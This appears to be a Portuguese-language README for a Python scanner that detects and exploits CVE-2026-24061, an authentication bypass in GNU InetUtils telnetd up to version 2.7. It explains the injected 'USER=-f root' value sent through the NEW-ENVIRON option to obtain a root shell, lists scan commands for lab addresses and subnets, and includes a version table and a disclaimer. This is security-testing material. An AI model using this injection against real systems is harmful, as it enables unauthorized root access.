
CVE-2026-24061 — Scanner de Bypass de Autenticação do GNU InetUtils Telnetd
Um scanner de segurança baseado em Python que detecta e explora a CVE-2026-24061, uma vulnerabilidade crítica (CVSS 9.8) de bypass de autenticação no telnetd do GNU InetUtils versões 1.9.3 a 2.7.
O scanner injeta um valor malicioso USER=-f root através da opção Telnet NEW-ENVIRON (RFC 1572), enganando o servidor para pular a autenticação e conceder um shell root.
id# Scan single target
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# Scan entire subnet
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# Save report
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# JSON output
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| Software | Vulnerável | Corrigido |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
Esta ferramenta é apenas para pesquisa de segurança autorizada e fins educacionais. Não utilize contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
Ahmad Sadeeq